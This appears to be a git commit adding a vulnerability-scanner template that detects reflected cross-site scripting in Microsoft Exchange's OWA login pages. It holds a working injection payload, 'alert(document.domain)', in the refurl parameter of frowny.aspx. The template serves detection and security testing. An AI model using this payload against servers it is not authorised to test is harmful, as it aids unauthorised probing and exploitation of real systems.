Create ms-exchange-server-reflected-xss.yaml

patch-1
Sanyam Chawla 2021-08-17 13:55:38 +05:30 committed by GitHub
parent 45a15ecf3e
commit 5072dbbcbb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: ms-exchange-server-reflected-xss
info:
name: MS Exchange Server XSS (
author: infosecsanyam
severity: high
description: |
Microsoft Exchange Server XSS.
reference: |
- https://www.shodan.io/search?query=http.title%3A%22Outlook%22
tags: exchangeserver,owa,xss
requests:
- method: GET
path:
- '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//'
matchers-condition: and
matchers:
- type: word
words:
- 'alert(document.domain)//'
condition: or
- type: status
status:
- 500